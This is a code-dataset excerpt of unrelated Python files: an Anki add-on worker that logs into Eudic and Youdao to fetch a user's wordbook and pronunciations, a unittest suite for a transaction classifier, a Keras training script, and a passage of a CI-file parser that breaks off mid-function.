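# ignore_discard=True matters because session cookies are otherwise dropped on
# save/load. The round trip, for illustration:
#
#   jar = cookielib.MozillaCookieJar()
#   jar.save('Eudict.cookie', ignore_discard=True)
#   jar.load('Eudict.cookie', ignore_discard=True)
# -----------------------------------------------------------------------------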
cookiejar):\n MozillaCookieJar = cookielib.MozillaCookieJar()\n for c in cookiejar:\n args = dict(vars(c).items())\n args['rest'] = args['_rest']\n del args['_rest']\n c = cookielib.Cookie(**args)\n MozillaCookieJar.set_cookie(c)\n MozillaCookieJar.save('Eudict.cookie', ignore_discard=True)\n\n def __loadCookies(self):\n if os.path.exists('Eudict.cookie'):\n MozillaCookieJar = cookielib.MozillaCookieJar()\n MozillaCookieJar.load('Eudict.cookie', ignore_discard=True)\n return MozillaCookieJar\n else:\n return False\n\n def run(self):\n req = urllib2.Request(\"https://my.eudic.net/StudyList/WordsDataSource?length=100000000&categoryid=-1\")\n cookie = self.__loadCookies()\n opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookie))\n urllib2.install_opener(opener)\n response = urllib2.urlopen(req).read()\n wordList = [term['uuid']for term in json.loads(response)['data']]\n self.emit(QtCore.SIGNAL('updateProgressBar_dict(int,int)'),int(1), int(1))\n self.results = wordList\n\nclass Youdao(QtCore.QThread):\n def __init__(self):\n QtCore.QThread.__init__(self)\n def login(self, username, password, rememberme):\n cj = cookielib.LWPCookieJar()\n opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))\n opener.addheaders = [('User-agent', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:58.0) Gecko/20100101 Firefox/58.0')]\n urllib2.install_opener(opener)\n\n authentication_url = 'https://logindict.youdao.com/login/acc/login'\n payload = {\n 'app':'web',\n 'tp':'urstoken',\n 'cf':'7',\n 'fr':'1',\n 'ru':'http://dict.youdao.com/wordbook/wordlist?keyfrom=login_from_dict2.index',\n 'product':'DICT',\n 'type':'1',\n 'um':'true',\n 'username':username,\n 'password':hashlib.md5(password.encode('utf-8')).hexdigest(),\n 'savelogin':rememberme and 1 or 0,\n }\n req = urllib2.Request(authentication_url, urllib.urlencode(payload))\n urllib2.urlopen(req)\n if username in str(cj):\n self.__saveCookies(cj)\n return True\n else:\n return False\n\n def __saveCookies(self, cookiejar):\n MozillaCookieJar = cookielib.MozillaCookieJar()\n for c in cookiejar:\n args = dict(vars(c).items())\n args['rest'] = args['_rest']\n del args['_rest']\n c = cookielib.Cookie(**args)\n MozillaCookieJar.set_cookie(c)\n MozillaCookieJar.save('Youdao.cookie', ignore_discard=True)\n\n def __loadCookies(self):\n if os.path.exists('Youdao.cookie'):\n MozillaCookieJar = cookielib.MozillaCookieJar()\n MozillaCookieJar.load('Youdao.cookie', ignore_discard=True)\n return MozillaCookieJar\n else:\n return False\n\n def run(self):\n def totalPage():\n # page index start from 0 end at max-1\n req = urllib2.Request('http://dict.youdao.com/wordbook/wordlist?p=0&tags=')\n cookie = self.__loadCookies()\n opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookie))\n urllib2.install_opener(opener)\n response = urllib2.urlopen(req)\n source = response.read()\n try:\n return int(re.search('最后一页', source, re.M | re.I).group(1)) - 1\n except Exception:\n return 1\n\n def everyPage(pageIndex):\n req = urllib2.Request(\"http://dict.youdao.com/wordbook/wordlist?p=\" + str(pageIndex) + \"&tags=\")\n opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.__loadCookies()))\n urllib2.install_opener(opener)\n response = urllib2.urlopen(req)\n return response.read().decode('utf-8')\n\n parser = parseYoudaoWordbook()\n tp = totalPage()\n f=open(\"guru99.txt\", \"a+\")\n f.write(\"totalPage is %s \\r\\n\" % tp)\n f.close()\n for current in range(tp):\n parser.feed(everyPage(current))\n 
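# --- Hedged editorial note (addition): totalPage() fallback -------------------
# The pattern passed to re.search() in totalPage() above contains no capture
# group, so .group(1) always raises, the except branch fires, and totalPage()
# returns 1 -- only the first wordbook page is ever fetched. A working pattern
# would need a group around the page number, e.g. something of the form
# u'最后一页.*?(\\d+)'; the exact regex depends on the wordlist page markup and
# is an assumption here.
# -----------------------------------------------------------------------------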
self.emit(QtCore.SIGNAL('updateProgressBar_dict(int,int)'),int(current+1), int(tp))\n\n self.results = parser.terms\n self.descresults = parser.descterms\n\n# Youdao Only\nclass parseYoudaoWordbook(HTMLParser):\n\n def __init__(self):\n HTMLParser.__init__(self)\n self.terms = []\n self.descterms = []\n\n def handle_starttag(self, tag, attrs):\n # retrive the terms\n \n if tag == 'div':\n for attribute, value in attrs:\n if attribute == 'class' and value == 'word':\n self.terms.append(attrs[1][1])\n if attribute == 'class' and value == 'desc':\n self.descterms.append(attrs[1][1])\t\t\t\t\n\n\nclass imageDownloader(QtCore.QThread):\n \"\"\"thread that download images of terms\"\"\"\n def __init__(self,imageUrls):\n QtCore.QThread.__init__(self)\n self.imageUrls = imageUrls\n\n def run(self):\n ti = len(self.imageUrls)\n for current in range(ti):\n urllib.urlretrieve(self.imageUrls[current][1], \"MG-\" + self.imageUrls[current][0] + '.jpg')\n self.emit(QtCore.SIGNAL('update'),current+1,ti)\n self.emit(QtCore.SIGNAL('updateProgressBar_img(int,int)'),int(current+1),int(ti))\n self.emit(QtCore.SIGNAL('seek_img(QString)'),str('Getting image: ' + self.imageUrls[current][0]))\n\nclass pronunciationDownloader(QtCore.QThread):\n def __init__(self,terms,ptype):\n QtCore.QThread.__init__(self)\n self.terms = terms\n self.ptype = ptype\n # 1 UK 2 US\n self.soundAPI = \"http://dict.youdao.com/dictvoice?audio={}&type={}\"\n\n def run(self):\n tp = len(self.terms)\n for current in range(tp):\n urllib.urlretrieve(self.soundAPI.format(self.terms[current],str(self.ptype)), \"MG-\" + self.terms[current] + '.mp3')\n self.emit(QtCore.SIGNAL('updateProgressBar_pron(int,int)'),int(current+1),int(tp))\n self.emit(QtCore.SIGNAL('seek_pron(QString)'),str('Getting pronunciation: ' + self.terms[current]))\n\nclass Lookupper(QtCore.QThread):\n def __init__(self, wordList,wordDescList):\n QtCore.QThread.__init__(self)\n self.wordList = wordList\n self.wordDescList = wordDescList\n self.lookUpedTerms = []\n def run(self):\n if self.wordList:\n tw = len(self.wordList)\n for current in range(tw):\n query = urllib.urlencode({\"q\": self.wordList[current]})\n f = urllib2.urlopen(\"https://dict.youdao.com/jsonapi?{}&dicts=%7b%22count%22%3a+99%2c%22dicts%22%3a+%5b%5b%22ec%22%2c%22phrs%22%2c%22pic_dict%22%5d%2c%5b%22web_trans%22%5d%2c%5b%22fanyi%22%5d%2c%5b%22blng_sents_part%22%5d%5d%7d\".format(query))\n r = f.read().decode('utf-8')\n try:\n json_result = json.loads(r)\n except:\n pass\n\n try:\n explains = self.wordDescList[current]\n except:\n try:\n explains = json_result[\"web_trans\"][\"web-translation\"][0][\"trans\"][0][\"value\"]\n except:\n try:\n explains = json_result[\"fanyi\"][\"tran\"]\n except:\n explains = None\n\n try:\n uk_phonetic = json_result[\"ec\"][\"word\"][0][\"ukphone\"]\n except:\n try:\n uk_phonetic = json_result[\"simple\"][\"word\"][0][\"ukphone\"]\n except:\n try:\n uk_phonetic = json_result[\"ec\"][\"word\"][0][\"phone\"]\n except:\n uk_phonetic = None\n\n try:\n us_phonetic = json_result[\"ec\"][\"word\"][0][\"usphone\"]\n except:\n try:\n us_phonetic = json_result[\"simple\"][\"word\"][0][\"usphone\"]\n except:\n try:\n us_phonetic = json_result[\"ec\"][\"word\"][0][\"phone\"]\n except:\n us_phonetic = None\n\n try:\n phrases = []\n phrase_explains = []\n json_phrases = json_result[\"phrs\"][\"phrs\"]\n for value in json_phrases:\n phrases.append(value[\"phr\"][\"headword\"][\"l\"][\"i\"])\n phrase_explains.append(value[\"phr\"][\"trs\"][0][\"tr\"][\"l\"][\"i\"])\n except:\n phrases = None\n 
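# --- Hedged editorial sketch (addition): flattening the try/except ladder ----
# The stacked try/except blocks above and below each probe one path into the
# Youdao JSON. An equivalent helper (an editorial alternative, not part of the
# original file) keeps the same "None on any miss" behaviour:
#
#   def dig(obj, *keys):
#       for k in keys:
#           try:
#               obj = obj[k]
#           except (KeyError, IndexError, TypeError):
#               return None
#       return obj
#
#   # e.g. uk_phonetic = dig(json_result, "ec", "word", 0, "ukphone")
# -----------------------------------------------------------------------------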
phrase_explains = None\n\n try:\n sentences = []\n sentences_explains = []\n json_sentences = json_result[\"blng_sents_part\"][\"sentence-pair\"]\n for value in json_sentences:\n sentences.append(value[\"sentence-eng\"])\n sentences_explains.append(value[\"sentence-translation\"])\n except:\n sentences = None\n sentences_explains = None\n\n try:\n img = json_result[\"pic_dict\"][\"pic\"][0][\"image\"] + \"&w=150\"\n except:\n img = None\n\n lookUpedTerm = {\n \"term\": self.wordList[current],\n \"uk\": uk_phonetic,\n \"us\": us_phonetic,\n \"definition\": explains,\n \"phrases\": phrases and phrases[:3] or None,\n \"phrases_explains\": phrase_explains and phrase_explains[:3] or None,\n \"sentences\": sentences and sentences[:3] or None,\n \"sentences_explains\": sentences_explains and sentences_explains[:3] or None,\n \"image\": img\n }\n self.lookUpedTerms.append(lookUpedTerm)\n self.emit(QtCore.SIGNAL('updateProgressBar_lookup(int,int)'),int(current+1),int(tw))\n self.emit(QtCore.SIGNAL('seek_lookup(QString)'),str('Looking up: ' + self.wordList[current]))\n else:\n self.emit(QtCore.SIGNAL('seek_lookup(QString)'),str('No word has been lookupped'))\n\n# test = Youdao()\n# test.run()\n# print test.results\n","sub_path":"python2/addons/Dict2Anki/worker.py","file_name":"worker.py","file_ext":"py","file_size_in_byte":11861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"651329589","text":"# Pablo Abad 2017-2018\n#\n# Toshl database program\n\nimport unittest\nimport datetime\nfrom toshl.SmartClassifer import ClassificationGroup, SmartClassifier, longest_common_substring\nfrom toshl.BankEntry import BankEntry\n\n\ndef _entry(account, ammount = -1):\n date = datetime.date(2017, 5, 13)\n return BankEntry(date, date, account, \"\", \"\", ammount)\n\n\nclass LCSTest(unittest.TestCase):\n def setUp(self):\n self.longMessage = True\n\n def test_lcs(self):\n self.assertEqual(\"\", longest_common_substring(\"\", \"\"))\n self.assertEqual(\"\", longest_common_substring(\"a\", \"\"))\n self.assertEqual(\"\", longest_common_substring(\"\", \"b\"))\n self.assertEqual(\"\", longest_common_substring(\"a\", \"b\"))\n self.assertEqual(\"abcd\", longest_common_substring(\"abcde\", \"tdsabcds\"))\n\n\nclass ClassificationGroupTest(unittest.TestCase):\n def setUp(self):\n self.unit = ClassificationGroup(minimumHintLength=3)\n self.longMessage = True\n\n def test_empty(self):\n self.assertEqual((None, None), self.unit.classify(_entry('abcde')), 'TestBasic: Classifier failed')\n\n def test_basic(self):\n self.unit.update(_entry('abcde'), 'c1', 't1')\n self.assertEqual(('c1', 't1'), self.unit.classify(_entry('abcde')), 'TestBasic: Classifier failed')\n\n def test_negative(self):\n self.unit.update(_entry('abcde'), 'c1', 't1')\n self.assertEqual((None, None), self.unit.classify(_entry('abcd')), 'TestBasic: Classifier failed')\n\n def test_longest_match(self):\n self.unit.update(_entry('abcde'), 'c1', 't1')\n self.unit.update(_entry('abcdefg'), 'c1', 't2')\n self.assertEqual(('c1', 't1'), self.unit.classify(_entry('abcde')), 'TestBasic: Classifier abcde')\n self.assertEqual(('c1', 't2'), self.unit.classify(_entry('abcdefg')), 'TestBasic: Classify abcdefg')\n\n def test_sub_match(self):\n self.unit.update(_entry('abcde'), 'c1', 't1')\n self.assertEqual(('c1', 't1'), self.unit.classify(_entry('ooooabcdefgoooo')), 'TestBasic: Classifier failed')\n\n def test_hint_minimise(self):\n self.unit.update(_entry('abcff'), 'c1', 't1')\n self.assertEqual((None, None), 
self.unit.classify(_entry('abc')), 'TestBasic: Classifier failed before minimize')\n self.unit.update(_entry('abckk'), 'c1', 't1')\n self.assertEqual(('c1', 't1'), self.unit.classify(_entry('abc')), 'TestBasic: Classifier failed after minimize')\n\n def test_no_add(self):\n self.unit.update(_entry('abcdd'), 'c1', 't1')\n self.unit.update(_entry('abcd'), 'c1', 't2')\n self.unit.update(_entry('abcff'), 'c1', 't1')\n self.assertEqual(('c1', 't1'), self.unit.classify(_entry('abcdd')), 'TestBasic: abcdd failed')\n self.assertEqual(('c1', 't1'), self.unit.classify(_entry('abc')), 'TestBasic: abc failed')\n self.assertEqual(('c1', 't2'), self.unit.classify(_entry('abcd')), 'TestBasic: abcd failed')\n self.assertEqual(('c1', 't1'), self.unit.classify(_entry('abcff')), 'TestBasic: abcff failed')\n\n\nclass SmartClassifierTest(unittest.TestCase):\n def setUp(self):\n self.unit = SmartClassifier()\n self.longMessage = True\n\n def test_smart_classifier(self):\n self.unit.update(_entry('abcde', -1), 'c1', 't1')\n self.unit.update(_entry('abcde', 1), 'i1', 't2')\n self.assertEqual(('c1', 't1'), self.unit.classify(_entry('abcde', -2)), 'TestBasic: expense failed')\n self.assertEqual(('c1', 't1'), self.unit.classify(_entry('abcde', 0)), 'TestBasic: expense 0 failed')\n self.assertEqual(('i1', 't2'), self.unit.classify(_entry('abcde', 3)), 'TestBasic: income failed')\n\n def test_storage(self):\n self.unit.update(_entry('abcde', -1), 'c1', 't1')\n self.unit.update(_entry('djsk', -1), 'c2', 't1')\n self.unit.update(_entry('dyuis', -1), 'c3', 't4')\n self.unit.update(_entry('abcde', 1), 'i1', 't2')\n self.unit.save('test.cls')\n another = SmartClassifier('test.cls')\n originalData = (self.unit.expenses.getData(), self.unit.incomes.getData())\n storedData = (another.expenses.getData(), another.incomes.getData())\n self.assertEqual(originalData, storedData)\n\n\nif __name__ == '__main__':\n unittest.main()","sub_path":"tests/test_SmartClassifier.py","file_name":"test_SmartClassifier.py","file_ext":"py","file_size_in_byte":4246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"509229429","text":"from __future__ import absolute_import, division, print_function\r\n\r\n# tensorflow and keras libraries to create the model\r\nimport tensorflow as tf\r\nfrom tensorflow import keras\r\nfrom tensorflow.keras.callbacks import ReduceLROnPlateau\r\nfrom tensorflow.keras.callbacks import ModelCheckpoint\r\n\r\n# sklearn library for splitting the data into train and test sets\r\nfrom sklearn.model_selection import train_test_split\r\n\r\nimport numpy as np\r\n\r\n\r\n# naming the files\r\nDATA_FILE = "dataset10_5000.csv"\r\nMODEL_FILE = "model_10_5000_lr_dropout.h5"\r\n# loading the data\r\ndataset = np.loadtxt(DATA_FILE, delimiter=",")\r\n\r\n# split the input as X and the output as Y\r\nX = dataset[:, 0:10] \r\nY = dataset[:, 10] \r\n\r\n#print(X)\r\n#print(Y)\r\n\r\n# splitting the data into test and train data\r\nx_train, x_test, y_train, y_test = train_test_split(X, Y, test_size=0.25)\r\n\r\n# we use a sequential model\r\nmodel = keras.Sequential()\r\n# adding layers\r\nmodel.add(keras.layers.Dense(64, input_dim=10, activation=tf.nn.relu))\r\nmodel.add(keras.layers.Dropout(0.5))\r\nmodel.add(keras.layers.Dense(9, activation=tf.nn.relu))\r\nmodel.add(keras.layers.Dense(3, activation=tf.nn.softmax))\r\n\r\n\r\n# compile the model with optimizer, loss and metrics\r\nmodel.compile(optimizer='adam',\r\n loss='sparse_categorical_crossentropy',\r\n metrics=['accuracy'])\r\n
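# --- Hedged editorial sketch (addition, not part of the original file) -------
# ModelCheckpoint is imported above but never used; it could be wired in next
# to ReduceLROnPlateau to keep the best weights seen during training (the
# filepath choice is an illustrative assumption):
#
#   checkpoint = ModelCheckpoint(MODEL_FILE, monitor='val_loss',
#                                save_best_only=True)
#   # ...then: model.fit(..., callbacks=[reduce_lr, checkpoint])
#
# Note: depending on the tf.keras version, the history keys plotted below may
# be 'accuracy'/'val_accuracy' rather than 'acc'/'val_acc'.
# -----------------------------------------------------------------------------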
\r\n# fit the model; keep the returned history for the plots below\r\nreduce_lr = ReduceLROnPlateau(monitor='val_loss', factor=0.2,\r\n patience=5, min_lr=0.001)\r\nhistory = model.fit(x_train, y_train, epochs=1000, batch_size=150, validation_data=(x_test, y_test), callbacks=[reduce_lr])\r\n\r\n# print summary and overall accuracy when the model has finished training\r\nmodel.summary()\r\nscores = model.evaluate(X, Y)\r\nprint("\\n%s: %.2f%%" % (model.metrics_names[1], scores[1]*100))\r\n\r\n# save the trained model\r\nmodel.save(MODEL_FILE)\r\n\r\n# import the packages for visualisation\r\nfrom keras.utils import plot_model\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\n# plot the layers\r\nplot_model(model, show_shapes=True, to_file='model.png')\r\n\r\n# Plot training & validation accuracy values (save before show, otherwise the saved figure is blank)\r\nplt.plot(history.history['acc'])\r\nplt.plot(history.history['val_acc'])\r\nplt.title('Model accuracy')\r\nplt.ylabel('Accuracy')\r\nplt.xlabel('Epoch')\r\nplt.legend(['Train', 'Test'], loc='upper left')\r\nplt.savefig('acc.png')\r\nplt.show()\r\n\r\n# Plot training & validation loss values on a fresh figure\r\nplt.figure()\r\nplt.plot(history.history['loss'])\r\nplt.plot(history.history['val_loss'])\r\nplt.title('Model loss')\r\nplt.ylabel('Loss')\r\nplt.xlabel('Epoch')\r\nplt.legend(['Train', 'Test'], loc='upper left')\r\nplt.savefig('loss.png')\r\nplt.show()\r\n\r\n\r\n","sub_path":"data_training.py","file_name":"data_training.py","file_ext":"py","file_size_in_byte":2554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"196478779","text":"#!/usr/bin/python3\n#########################################################\n#\n# > Parser / Evaluator for CI files\n# > in GitLab CI file like syntax\n#\n# vim: sw=4 ts=4 noexpandtab:\n\nimport os, sys, threading\nimport yaml, re\nfrom copy import deepcopy\n\n#########################################################\n## List of keys\n# See for comparison and more info: https://docs.gitlab.com/ce/ci/yaml/README.html\n#\nPIPELINEKEY_SERVICES = "services" # Will probably never get supported\nPIPELINEKEY_IMAGE = "image" # Docker / Image manager info\nPIPELINEKEY_VARIABLES = "variables" # Job global env variables\nPIPELINEKEY_STAGES = "stages" # job order\nPIPELINEKEY_BEFORE_SCRIPT = "before_script" # Script to run before all jobs\nPIPELINEKEY_AFTER_SCRIPT = "after_script" # Script to run after all jobs\n\nJOBKEY_VARIABLES = PIPELINEKEY_VARIABLES # Exported env vars\nJOBKEY_ONLY = "only" # Only start job if matched\nJOBKEY_TAGS = "tags" # Only start job on client with given tag\nJOBKEY_STAGE = "stage" # The stage (build, test, ...)\nJOBKEY_SCRIPT = "script" # List of actions to execute\nJOBKEY_ARTIFACTS = "artifacts" # List of things to place in job artifact archive\nJOBKEY_DEPENDENCIES = "dependencies" # Restores artifacts from given jobs\nJOBKEY_ARTIFACTS_NAME = "name"\nJOBKEY_ARTIFACTS_PATHS = "paths"\nJOBKEY_ARTIFACTS_EXPIRE_IN = "expire_in"\nJOBKEY_ONLY_VARIABLES = "variables"\nJOBKEY_ONLY_REFS = "refs"\n\nMATRIXKEY_STAGES = PIPELINEKEY_STAGES # available stages\nMATRIXKEY_IMAGE = PIPELINEKEY_IMAGE # image to load for this pipeline\nMATRIXKEY_JOBS = "jobs" # collection of jobs, grouped by index of stage\n\n# Reserved keys - list of disallowed job names\nPIPELINES_KEYS = [PIPELINEKEY_STAGES, PIPELINEKEY_IMAGE, PIPELINEKEY_BEFORE_SCRIPT, PIPELINEKEY_AFTER_SCRIPT, PIPELINEKEY_VARIABLES, PIPELINEKEY_SERVICES]\nJOB_KEYS = [JOBKEY_DEPENDENCIES,JOBKEY_SCRIPT,JOBKEY_STAGE,JOBKEY_VARIABLES,JOBKEY_ARTIFACTS]\n\n\nclass IdGenerator(object):\n """\n A class 
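# --- Hedged editorial sketch (addition): IdGenerator usage -------------------
# Values are illustrative; IdGenerator is defined directly below:
#
#   gen = IdGenerator(last_job_id=41, last_pipeline_id=6)  # e.g. restored from a DB
#   gen.next_pipeline_id()  # -> 7
#   gen.next_job_id()       # -> 42
#   gen.current_ids()       # -> {"job": 42, "pipeline": 7}
#
# The internal lock makes the counters safe to share across builder threads.
# -----------------------------------------------------------------------------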
which provides an ID for jobs & pipelines.\n Supposed to be passed as per-project preserved object.\n \"\"\"\n\n def __init__(self, last_job_id=0, last_pipeline_id=0):\n self._last_job_id = last_job_id\n self._last_pipeline_id = last_pipeline_id\n self._lock = threading.Lock()\n\n def next_pipeline_id(self):\n with self._lock:\n self._last_pipeline_id += 1\n ret = self._last_pipeline_id\n return ret\n def next_job_id(self):\n with self._lock:\n self._last_job_id += 1\n ret = self._last_job_id\n return ret\n def current_ids(self):\n return {\"job\": self._last_job_id, \"pipeline\": self._last_pipeline_id}\n\n\nclass CiFile:\n \"\"\"\n 1) Init this with a per-project preservered id_generator with initial values (e.g. from DB)\n Optionally pass variables (from e.g. API) in the variables dict parameter\n 2) Use `read_cifile` to read a cifile from YAML or pass a otherwise read dict\n This will apply many fixes, refactorings and other actions to make it ready for use\n 3) Use `prepare_run_with` when you have repository details available and you are about to start building\n There are some important required arguments which are needed to filter jobs not allowed to run (by e.g. variable condition)\n 4) Use `convert_to_matrix` to get a copy of the values in a |pipeline -> stages -> jobs| hierachy\n This allows to easy process the jobs in correct order\n 5) Processing order inside a stage does not matter, can be random\n All jobs in one stage must have run and all must be successful for the next stage to start\n When all jobs in last stage are completed successfully, the pipeline is successfully\n \"\"\"\n\n def __init__(self,\n id_generator=IdGenerator(),\n default_stage=\"test\",\n default_image=\"local_system_shell\",\n default_artifact_expire_in=\"3 days\",\n default_artifact_name=\"${CI_JOB_NAME}_${CI_COMMIT_REF_NAME}_${CI_JOB_ID}\",\n variables=None):\n \"\"\"\n Provide a project-wide id generator, initialized with the last ID used.\n \"\"\"\n\n self._cidict = {}\n self._default_stage = default_stage\n self._default_image = default_image\n self._default_artifact_name = default_artifact_name\n self._default_artifact_expire_in = default_artifact_expire_in\n self._forced_variables = variables or {}\n self._id_generator = id_generator\n\n def convert_to_matrix(self):\n \"\"\"\n Convert CI Dictionary to a matrix view. 
Note that this is a copy of an\n internal dict and changes don't affect the internal dict nor the matrix\n can be used as CiFile again.\n\n Matrix:\n - image\n - jobs: Dict of jobs grouped by stage, orded by order in `stages`\n - stages: Name and order of all stages\n \"\"\"\n\n pipeline = {\n MATRIXKEY_JOBS: [],\n MATRIXKEY_STAGES: self._cidict[PIPELINEKEY_STAGES],\n MATRIXKEY_IMAGE: self._cidict[PIPELINEKEY_IMAGE],\n }\n for stage in self._cidict[PIPELINEKEY_STAGES]:\n jobs = {}\n for jobname, job in self._cidict.items():\n if jobname not in PIPELINES_KEYS and isinstance(job, dict) and job[JOBKEY_STAGE] == stage:\n jobs[jobname] = job\n pipeline[MATRIXKEY_JOBS].append(jobs)\n return pipeline\n\n @staticmethod\n def print_matrix(matrix):\n \"\"\"\n Print given matrix (from `convert_to_matrix`) to command line.\n \"\"\"\n\n for i, stage in enumerate(matrix[MATRIXKEY_STAGES]):\n print(\"\\nJobs for \" + stage + \" (\" + str(len(matrix[MATRIXKEY_JOBS][i])) +\"):\")\n for jobname, job in matrix[MATRIXKEY_JOBS][i].items():\n print(\"├──\" + str(jobname)) #+ \", \" + job[JOBKEY_VARIABLES][\"CI_JOB_ID\"])\n\n def _parse_cidict(self, cidict):\n \"\"\"\n Fill missing but deductable information into the *cidict* and store it\n in self.\n \"\"\"\n\n if not isinstance(cidict, dict):\n raise TypeError('expected dict, got {}'.format(type(cidict).__name__))\n\n self._cidict = cidict\n\n # Note: calls are order dependent.\n\n self._pipeline_various_tweaks()\n\n self._job_scan_apply_stages()\n self._job_convert_list_to_script()\n self._job_scan_apply_stages()\n\n self._job_convert_before_after_script()\n\n self._job_various_tweaks()\n self._job_script_always_list()\n self._job_combine_variables()\n self._job_streamline_only()\n self._job_streamline_artifacts()\n\n return self\n\n def prepare_run_with(self, ci_commit_ref_name, ci_pipeline_source, ci_commit_message, ci_commit_sha, ci_commit_tag=None):\n \"\"\"\n Based upon https://docs.gitlab.com/ce/ci/variables/#predefined-variables-environment-variables\n ci_commit_ref_name: Branch or tag name for which project is built\n ci_pipeline_source: Indicates how the pipeline was triggered. Options include push, web, trigger, schedule, api, pipeline\n ci_commit_message: Full commit message\n ci_commit_sha: Commit hash\n ci_commit_tag: The commit tag name. Present only when building tags.\n \"\"\"\n\n self._pipeline_add_buildinfo(ci_commit_ref_name, ci_pipeline_source, ci_commit_message, ci_commit_sha, ci_commit_tag)\n self._evaluate_jobs()\n self._assign_ids()\n\n def read_cifile(self, fyaml=None, dictionary=None):\n \"\"\"\n Read and parse CI file from yaml or otherwise loaded dictionary. 
Returns\n *self* for call chaining.\n \"\"\"\n\n if fyaml:\n with open(fyaml, 'r') as f:\n dictionary=yaml.load(f.read())\n if dictionary:\n self._parse_cidict(dictionary)\n return self\n\n def get_cidict(self):\n \"\"\"\n Get a copy of the internal cidict.\n \"\"\"\n\n return deepcopy(self._cidict)\n\n @staticmethod\n def extract_str_list(obj, noneval=[]):\n \"\"\"\n Try to get a list of strings from *obj*, allowing it to exist in various\n formats.\n \"\"\"\n\n if obj is None:\n return noneval\n if isinstance(obj, str):\n return [obj]\n if isinstance(obj, (int, bool, float)):\n return [str(obj)]\n elif isinstance(obj, list):\n return [str(o) for o in obj if isinstance(o, (str,int, bool, float))]\n return noneval\n\n @staticmethod\n def extract_str(obj, noneval=\"\"):\n \"\"\"\n Try to get a string from *obj*, taking various cases into account.\n \"\"\"\n\n if isinstance(obj, (str,int, bool, float)):\n return str(obj)\n elif isinstance(obj, list):\n strs = [ o for o in obj if isinstance(o,str) ]\n return strs[0] if strs else noneval\n return noneval\n\n @staticmethod\n def extract_str_dict(d):\n \"\"\"\n Apply #extract_str() to every value in the dictionary *d*.\n Returns a new dictionary that does not contain the values that could\n not be coerced to strings.\n \"\"\"\n\n ret = {}\n for var, value in (d if isinstance(d, dict) else {}).items():\n value = CiFile.extract_str(value, None)\n if value:\n ret[var] = value\n return ret\n\n def _pipeline_various_tweaks(self):\n \"\"\"\n Various smaller tweaks for the whole pipeline.\n \"\"\"\n\n # filter out templates (started with dot)\n self._cidict = {jobname:job for (jobname,job) in self._cidict.items() if isinstance(jobname,str) and not jobname.startswith(\".\") }\n\n # image (docker etc) - ensure one string\n tmp = self.extract_str(self._cidict[PIPELINEKEY_IMAGE] if PIPELINEKEY_IMAGE in self._cidict else self._default_image, self._default_image)\n self._cidict[PIPELINEKEY_IMAGE] = tmp if isinstance(tmp, str) else self._default_image\n\n def _job_scan_apply_stages(self):\n \"\"\"\n Scan for stages, assign default stages to jobs not having one.\n \"\"\"\n\n # Extract stages list - string only list without subitems\n stages = self._cidict.pop(PIPELINEKEY_STAGES) if PIPELINEKEY_STAGES in self._cidict else []\n\n # Scan for unspecified stages\n for job, v in self._cidict.items():\n if job not in PIPELINES_KEYS and isinstance(v, dict) and JOBKEY_STAGE in self._cidict[job]: # is job with stage\n stage = self.extract_str(self._cidict[job][JOBKEY_STAGE])\n if stage and not stage in stages:\n stages.append(stage)\n\n # Add default stage when nothing found\n stages=stages if stages else [self._default_stage]\n\n # Assign default stage for jobs with none or invalid\n for jobname, v in self._cidict.items():\n if jobname not in PIPELINES_KEYS and isinstance(v, dict):\n stage=self.extract_str(self._cidict[jobname][JOBKEY_STAGE] if JOBKEY_STAGE in self._cidict[jobname] else stages[0], noneval=stages[0])\n self._cidict[jobname][JOBKEY_STAGE] = stage\n\n self._cidict[PIPELINEKEY_STAGES] = stages\n\n def _job_convert_before_after_script(self):\n \"\"\"\n Convert before_script, post_script to a normal job (so this works like\n any other job in matrix ;)\n \"\"\"\n\n for jobkey in [PIPELINEKEY_BEFORE_SCRIPT, PIPELINEKEY_AFTER_SCRIPT]:\n job = {JOBKEY_STAGE: jobkey, JOBKEY_SCRIPT: []}\n job[JOBKEY_SCRIPT] = self._cidict[jobkey] if jobkey in self._cidict else []\n if len(job[JOBKEY_SCRIPT]) > 0:\n del self._cidict[jobkey]\n self._cidict[jobkey.replace('_',':')] = 
job\n if jobkey == PIPELINEKEY_BEFORE_SCRIPT:\n self._cidict[PIPELINEKEY_STAGES].insert(0, PIPELINEKEY_BEFORE_SCRIPT)\n if jobkey == PIPELINEKEY_AFTER_SCRIPT:\n self._cidict[PIPELINEKEY_STAGES].append(PIPELINEKEY_AFTER_SCRIPT)\n\n def _job_convert_list_to_script(self):\n \"\"\"\n If a job only has a list, move that to script\n job:name: job:name:\n - make script:\n - make\n \"\"\"\n\n for jobname, v in self._cidict.items():\n if jobname not in PIPELINES_KEYS and isinstance(v, list):\n script=self.extract_str_list(self._cidict[jobname], noneval=None)\n if script:\n self._cidict[jobname] = {JOBKEY_SCRIPT: script}\n\n def _job_script_always_list(self):\n \"\"\"\n Make sure a job script part is always a list and a job always has script\n job:name: job:name:\n script: make script:\n - make\n \"\"\"\n\n for jobname, job in self._cidict.items():\n if jobname not in PIPELINES_KEYS:\n if not JOBKEY_SCRIPT in job:\n job[JOBKEY_SCRIPT] = []\n script=self.extract_str_list(job[JOBKEY_SCRIPT], noneval=[])\n if script:\n self._cidict[jobname][JOBKEY_SCRIPT] = script\n\n def _job_streamline_artifacts(self):\n \"\"\"\n Make sure a job always specifies artifact info accordingly\n job:name:\n artifacts:\n name: \"name_of_archive_file\"\n expire_in: \"7 days\"\n paths:\n - dist\n - build/some.log\n \"\"\"\n\n for jobname, job in self._cidict.items():\n if jobname not in PIPELINES_KEYS:\n artifacts = {\n JOBKEY_ARTIFACTS_NAME: self._default_artifact_name,\n JOBKEY_ARTIFACTS_EXPIRE_IN: self._default_artifact_expire_in,\n JOBKEY_ARTIFACTS_PATHS: []\n }\n if JOBKEY_ARTIFACTS in job:\n if isinstance(job[JOBKEY_ARTIFACTS], list):\n artifacts[JOBKEY_ARTIFACTS_PATHS] = self.extract_str_list(job[JOBKEY_ARTIFACTS])\n if 